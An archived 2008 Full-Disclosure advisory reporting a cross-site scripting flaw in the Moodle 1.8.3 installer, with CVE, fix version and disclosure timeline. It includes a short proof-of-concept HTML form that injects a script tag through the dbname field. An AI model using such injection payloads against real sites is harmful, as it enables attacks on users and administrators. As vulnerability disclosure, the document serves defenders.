[Full-disclosure] Cross site scripting (XSS) in Moodle 1.8.3
ml at hboeck.de
Fri Jan 11 23:51:55 GMT 2008
Source URL of this announcement:
Moodle is a course management system for educators.
The installer code is vulnerable to Cross Site Scripting, letting you inject
installed moodle, so this can be considered low impact. Still it's possible
to attack if an attacker knows from another person installing moodle.
Sample XSS code:
<form method="post" action="http://localhost/moodle/install.php">
<input type="hidden" name="stage" value="3">
<input type="text" name="dbname" value='"><script>alert(1)</script>'>
Update to 1.8.4.
2007-01-08 Vendor contacted
2007-01-08 Vendor fixed cvs
2007-01-11 Vendor released 1.8.4
The Common Vulnerabilities and Exposures (CVE) project has assigned the name
CVE-2008-0123 to this issue. This is a candidate for inclusion in the CVE
list (http://cve.mitre.org/), which standardizes names for security problems.
Credits and copyright
This vulnerability was discovered by Hanno Boeck of schokokeks.org webhosting.
It's licensed under the creative commons attribution license.
Hanno Boeck, 2008-01-12, http://www.hboeck.de
Hanno Böck Blog: http://www.hboeck.de/
GPG: 3DBD3B20 Jabber/Mail: hanno at hboeck.de
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Size: 189 bytes
Desc: This is a digitally signed message part.
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080112/93971121/attachment.bin
Full-Disclosure is hosted and sponsored by Secunia.